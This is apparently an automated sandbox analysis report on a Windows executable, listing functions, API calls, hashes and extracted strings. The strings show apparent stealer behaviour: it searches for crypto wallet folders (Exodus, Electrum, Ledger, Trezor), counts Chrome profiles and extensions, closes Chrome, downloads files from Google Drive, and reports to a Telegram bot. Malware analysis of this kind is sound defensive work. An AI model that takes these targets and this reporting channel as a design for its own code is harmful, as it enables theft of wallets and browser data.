                                                                                                                                                                  • Opcode ID: 62bf130c463619ec29d0d8d55888deae984f946e5c3730f6e35f799ff8edb434
                                                                                                                                                                  • Instruction ID: ff2b43b6d1eb8d67447f8beb76ed279f9f80a0822c37b2e7f4c8e0b1a07fbacf
                                                                                                                                                                  • Opcode Fuzzy Hash: 62bf130c463619ec29d0d8d55888deae984f946e5c3730f6e35f799ff8edb434
                                                                                                                                                                  • Instruction Fuzzy Hash: 5EA2D772A18B8695EB10EF24D8443ECA761FB657B8F904731DA9C17AD9DF39E180C720
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                  • String ID: *L\(&.$.lck$.zip$C:\Program Files\Google\Chrome\Extensions$Download failed$Extensions count: $Profiles count: $create_directories$exists$remove
                                                                                                                                                                  • API String ID: 3708190391-3543784359
                                                                                                                                                                  • Opcode ID: 62b833c19f07cab37c743a9f6876da6e8e553b65f9d6d486f88c02d699a6eb0a
                                                                                                                                                                  • Instruction ID: e06da96c0b69c9bcb2397be4b7ec25fafc029f579e90eb5181054d29d52e0aa1
                                                                                                                                                                  • Opcode Fuzzy Hash: 62b833c19f07cab37c743a9f6876da6e8e553b65f9d6d486f88c02d699a6eb0a
                                                                                                                                                                  • Instruction Fuzzy Hash: ADA2B662A18B8185EB10EF24DC443ADA761FB657B8F904331EA9D17BD9DF78E180CB50

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseHandle$FileOpenRead
                                                                                                                                                                  • String ID: *L\(&.$Could not fetch IP$Error parsing JSON response: $IPInfoFetcher$InternetOpen failed.$InternetOpenUrl failed.$Location not available$N/A$city$country$https://ipinfo.io/json$region
                                                                                                                                                                  • API String ID: 427349759-574423550
                                                                                                                                                                  • Opcode ID: 58ffc4d046cca1e95bd368871505dfab2008cae1416945f4e614302b2e31a680
                                                                                                                                                                  • Instruction ID: 6e82300eb563a12466b0901117e28950c835732cd3150513d87eeaca4c753cd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 58ffc4d046cca1e95bd368871505dfab2008cae1416945f4e614302b2e31a680
                                                                                                                                                                  • Instruction Fuzzy Hash: BF927622B18BC245EB20EF24DC543FD6361EB657A8F805631DA5D07ADADF78E640CB50
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisCreateFileInitializeInstance
                                                                                                                                                                  • String ID: does not exist or is not accessible.$*L\(&.$C:\Users$Failed to create ShellLink COM object.$Failed to get IPersistFile interface.$Failed to save shortcut file.$The directory $User: $directory_entry::status$directory_iterator::directory_iterator$exists$status
                                                                                                                                                                  • API String ID: 2171753736-2851832695
                                                                                                                                                                  • Opcode ID: 5e2a96f7ca63f26869e68c91b0ce2bb6b1c597c58515fa82a34e911a5c6d684c
                                                                                                                                                                  • Instruction ID: 7742b5fc97d5d79a6c790227b2390ca6664f19e0412553a070770a4b8effdc9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e2a96f7ca63f26869e68c91b0ce2bb6b1c597c58515fa82a34e911a5c6d684c
                                                                                                                                                                  • Instruction Fuzzy Hash: 8572D462F18B4695EB10EB65D8442BDA361FF69BB4F804631DE9C13A99DF3CE580CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileFind$CloseConcurrency::cancel_current_taskDeleteEnvironmentFirstNextVariable
                                                                                                                                                                  • String ID: *L\(&.$.lnk$C:\Users\$Deleted: $Error finding user directories$Failed to delete: $USERPROFILE$\Desktop$directory_entry::status$directory_iterator::directory_iterator$exists
                                                                                                                                                                  • API String ID: 1014275803-3978257810
                                                                                                                                                                  • Opcode ID: 811282472416ae1783f424dbd5c13e12312b9a29ec11f78a58be7286b119b0da
                                                                                                                                                                  • Instruction ID: 40bd1ab49800e62e25dc6d1cb71ce438ec4bb2fac55d6205bef71c036c49e7d2
                                                                                                                                                                  • Opcode Fuzzy Hash: 811282472416ae1783f424dbd5c13e12312b9a29ec11f78a58be7286b119b0da
                                                                                                                                                                  • Instruction Fuzzy Hash: 48728972A18B8691EA20EB15E8443BEE361FBA57B4F904231DADD036D5DF7CE584CB10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseFileHandleOpenRead
                                                                                                                                                                  • String ID: %%%02X$&parse_mode=HTML$&text=$*L\(&.$/sendMessage?chat_id=$InternetOpen failed.$InternetOpenUrl failed.$TelegramBot$https://api.telegram.org/bot
                                                                                                                                                                  • API String ID: 490362910-2377324344
                                                                                                                                                                  • Opcode ID: 2116c08122732905607294f5540b89ffce0c194dcefc27091b70f05a335ee373
                                                                                                                                                                  • Instruction ID: c163ede0effed24da6ae0b13f51af452b0940d6e3520b6aa47bcbd2b45a71b20
                                                                                                                                                                  • Opcode Fuzzy Hash: 2116c08122732905607294f5540b89ffce0c194dcefc27091b70f05a335ee373
                                                                                                                                                                  • Instruction Fuzzy Hash: BD12CB62E18B8545E710EB34D8443BD6761FBA97B8F905331EAAC02AD6DF7CE180DB50

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle_invalid_parameter_noinfo_noreturn$FileOpenRead
                                                                                                                                                                  • String ID: &export=download$*$*L\(&.$DST: $Failed to open file for writing.$File downloaded successfully and saved as $FileDownloader$InternetOpen failed.$InternetOpenUrl failed.$URL: $https://drive.google.com/uc?id=
                                                                                                                                                                  • API String ID: 1313048855-3458622595
                                                                                                                                                                  • Opcode ID: f90a2fdffaa1c6873038af76952001493e8ca45214174326fbfaffb7a70e20a2
                                                                                                                                                                  • Instruction ID: 42b94a423962e925a1308c401f4789ae95ad6197e3941f3bd5d1085132bc7f68
                                                                                                                                                                  • Opcode Fuzzy Hash: f90a2fdffaa1c6873038af76952001493e8ca45214174326fbfaffb7a70e20a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 36F1D862F18B4681FA14EB64E8443BDA361FB65BB4F904231DA9C46AD9DF7CF480CB10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • NetUserEnum.NETAPI32(?,?,?,?,?,00000000,?,00007FF72C9B93EA), ref: 00007FF72C9B8B31
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF72C9B93EA), ref: 00007FF72C9B8B92
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF72C9B93EA), ref: 00007FF72C9B8BE6
                                                                                                                                                                  • NetApiBufferFree.NETAPI32(?,?,?,?,?,00000000,?,00007FF72C9B93EA), ref: 00007FF72C9B8C72
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9B8CB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$BufferEnumFreeUser_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor$exists$status
                                                                                                                                                                  • API String ID: 3930398341-2954937949
                                                                                                                                                                  • Opcode ID: bcadf20640420031074605f38039830a50cdc84bb0a0e0709c0706a48c0f022b
                                                                                                                                                                  • Instruction ID: 2ccf593f2c47ba0f65204b1fa971b51fa4b77e0ba65b95bd929f255d4d506ca9
                                                                                                                                                                  • Opcode Fuzzy Hash: bcadf20640420031074605f38039830a50cdc84bb0a0e0709c0706a48c0f022b
                                                                                                                                                                  • Instruction Fuzzy Hash: BA51D772B19B419AE710EF61E8802ADB3A5FB5CBA8F804135EE9D57B98DF38D141C704

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2398595512-578493202
                                                                                                                                                                  • Opcode ID: 084919010e652b5f85a0bab5836ad3d9afdd541a1c584fafeb2c470db68b38aa
                                                                                                                                                                  • Instruction ID: a88de1b1d7d8b10aa2fde3f08d24bf600ca457489baecb30f5986f625e86c782
                                                                                                                                                                  • Opcode Fuzzy Hash: 084919010e652b5f85a0bab5836ad3d9afdd541a1c584fafeb2c470db68b38aa
                                                                                                                                                                  • Instruction Fuzzy Hash: B5917531A0CAC246F7646B25BC04679B2A4EF75BB0F940731D9BE476D4EE3CE8458B60

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotTerminateToolhelp32_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$All Chrome instances closed.$Failed to create process snapshot.$No Chrome instances found or failed to close.$Terminating Chrome process with PID $chrome.exe
                                                                                                                                                                  • API String ID: 2017165370-1680418533
                                                                                                                                                                  • Opcode ID: 51d06e4672338ef495216ec558f695adddee4ec15272c40506ae06f82aa901c2
                                                                                                                                                                  • Instruction ID: c492117f028dd3e589ce3b23de1e4308cb3cfcf8c8f1afd6824a09aa29b1f056
                                                                                                                                                                  • Opcode Fuzzy Hash: 51d06e4672338ef495216ec558f695adddee4ec15272c40506ae06f82aa901c2
                                                                                                                                                                  • Instruction Fuzzy Hash: B7B1F962B18A4592EA14E715EC40379E3A1FF957F4F904331EAED076E9DE3CE5818B10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskEnumUser_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor
                                                                                                                                                                  • API String ID: 2880872648-4258732720
                                                                                                                                                                  • Opcode ID: 704f971cbf8b29ea90b7d1f6c78561c3ab623a82f039f29d964e06d0727a3049
                                                                                                                                                                  • Instruction ID: 8ba1240f0cf61650545a14229cdd74b202b229fa7a710bd6de1056c2dcebc4f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 704f971cbf8b29ea90b7d1f6c78561c3ab623a82f039f29d964e06d0727a3049
                                                                                                                                                                  • Instruction Fuzzy Hash: 20A17232914BC685E320DF34DC81BE97761FBAA35CF905325EA8C26959EF78A2D4C740

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D30D
                                                                                                                                                                    • Part of subcall function 00007FF72CA0C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0C9E4
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: RtlFreeHeap.NTDLL(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08356
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: GetLastError.KERNEL32(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08360
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD69
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD8E
                                                                                                                                                                    • Part of subcall function 00007FF72CA1695C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA168A7
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D2FC
                                                                                                                                                                    • Part of subcall function 00007FF72CA0CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0CA44
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D572
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D583
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D594
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF72CA0D7D4), ref: 00007FF72CA0D5BB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                  • String ID: *L\(&.$Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                  • API String ID: 4070488512-1557497274
                                                                                                                                                                  • Opcode ID: a1c57b64b8f7897bd49e6a6251379af1a2d842da872961474b1cb5948339e0d9
                                                                                                                                                                  • Instruction ID: 09f6f7e8806088d4e3a1f3b9f3db594dfd41b155fcc575d0c95aa0d9bce86766
                                                                                                                                                                  • Opcode Fuzzy Hash: a1c57b64b8f7897bd49e6a6251379af1a2d842da872961474b1cb5948339e0d9
                                                                                                                                                                  • Instruction Fuzzy Hash: 44D1BD26E0864286F720BF35AC51AB9A671FFA47E4FC04136EA4D47686DF3DE441CB60

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                  • Opcode ID: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                  • Instruction ID: 535214d37bf8c7471bdd47007ca668d546700058b4da72569195388c016918ba
                                                                                                                                                                  • Opcode Fuzzy Hash: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                  • Instruction Fuzzy Hash: 34C1C232B28A8186FB10DF74E891AAC7771F769BA8F400229DE5E57395CF38E055CB50

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph, first block at 7ff72ca0d544 (node and edge list omitted). API call named in the graph: GetTimeZoneInformation
                                                                                                                                                                  APIs
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D572
                                                                                                                                                                    • Part of subcall function 00007FF72CA0CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0CA44
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D583
                                                                                                                                                                    • Part of subcall function 00007FF72CA0C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0C9E4
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D594
                                                                                                                                                                    • Part of subcall function 00007FF72CA0CA00: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0CA14
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: RtlFreeHeap.NTDLL(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08356
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: GetLastError.KERNEL32(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08360
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF72CA0D7D4), ref: 00007FF72CA0D5BB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                  • String ID: *L\(&.$Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                  • API String ID: 3458911817-1557497274
                                                                                                                                                                  • Opcode ID: 2944c04eb7c41efa3648f624bd773368126fd2a2f81730bb4c178720c0af1b5c
                                                                                                                                                                  • Instruction ID: 12c33a8cb8da50f6c631b65f7473eac2d063a7f5e39aec66156c93409656ae30
                                                                                                                                                                  • Opcode Fuzzy Hash: 2944c04eb7c41efa3648f624bd773368126fd2a2f81730bb4c178720c0af1b5c
                                                                                                                                                                  • Instruction Fuzzy Hash: 84513232E1864286F720FF71BC91AA9A670FBA87A4F805135DA4D47696DF3DE440CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Find$CloseConcurrency::cancel_current_taskFileNext__std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$1$directory_entry::status$directory_iterator::directory_iterator$exists
                                                                                                                                                                  • API String ID: 1745604696-1086011483
                                                                                                                                                                  • Opcode ID: 302d14e2479f379c21ca987c68d88d4f40f7e596c6409efbd4202fd291e07638
                                                                                                                                                                  • Instruction ID: f7580db4bf636d55528e62acaf39fc4f6d2d5aea0b001cb8968ea1506e10f667
                                                                                                                                                                  • Opcode Fuzzy Hash: 302d14e2479f379c21ca987c68d88d4f40f7e596c6409efbd4202fd291e07638
                                                                                                                                                                  • Instruction Fuzzy Hash: 7ED1B962A58B8551EA20EB15E84437EA361FBA57B0F908631DADD036D5DF7CE480CB10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
